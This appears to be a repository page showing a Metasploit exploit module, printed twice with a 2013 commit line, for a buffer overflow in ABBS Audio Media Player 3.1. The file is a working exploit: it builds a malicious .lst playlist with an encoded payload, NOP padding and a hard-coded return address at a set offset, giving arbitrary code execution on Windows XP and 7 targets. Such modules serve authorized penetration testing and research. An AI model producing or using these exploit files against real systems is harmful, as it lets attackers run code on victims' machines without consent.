metasploit-framework/modules/exploits/windows/fileformat/abbs_amp_lst.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ABBS Audio Media Player .LST Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
				occurs when adding an .lst, allowing arbitrary code execution with the privileges
				of the user running the application . This module has been tested successfully on
				ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Julian Ahrens', # Vulnerability discovery and PoC
					'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
				],
			'References'     =>
				[
					[ 'OSVDB', '75096' ],
					[ 'EDB', '25204' ]
				],
			'DefaultOptions'  =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'           => 2000,
					'BadChars'        => "\x00\x0a\x0d",
					'DisableNops'     => true,
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
						{
							'Ret'     => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
							'Offset'  => 4112
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 30 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
			], self.class)

	end

	def exploit
		buffer = payload.encoded
		buffer << make_nops(4108 - (payload.encoded.length))
		buffer << [target.ret].pack('V')
		buffer << make_nops(8)
		buffer << rand_text_alpha_upper(800)
		file_create(buffer)
	end
end
Added abbs amp exploit module 2013-06-30 20:08:22 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::FILEFORMAT`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'ABBS Audio Media Player .LST Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability`
			`occurs when adding an .lst, allowing arbitrary code execution with the privileges`
			`of the user running the application . This module has been tested successfully on`
			`ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Julian Ahrens', # Vulnerability discovery and PoC`
			`'modpr0be <modpr0be[at]spentera.com>' # Metasploit module`
			`],`
			`'References' =>`
			`[`
			`[ 'OSVDB', '75096' ],`
			`[ 'EDB', '25204' ]`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`'InitialAutoRunScript' => 'migrate -f'`
			`},`
			`'Platform' => 'win',`
			`'Payload' =>`
			`{`
			`'Space' => 2000,`
			`'BadChars' => "\x00\x0a\x0d",`
			`'DisableNops' => true,`
			`'StackAdjustment' => -3500,`
			`},`
			`'Targets' =>`
			`[`
			`[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',`
			`{`
			`'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe`
			`'Offset' => 4112`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Jun 30 2013',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),`
			`], self.class)`

			`end`

			`def exploit`
			`buffer = payload.encoded`
			`buffer << make_nops(4108 - (payload.encoded.length))`
			`buffer << [target.ret].pack('V')`
			`buffer << make_nops(8)`
			`buffer << rand_text_alpha_upper(800)`
			`file_create(buffer)`
			`end`
			`end`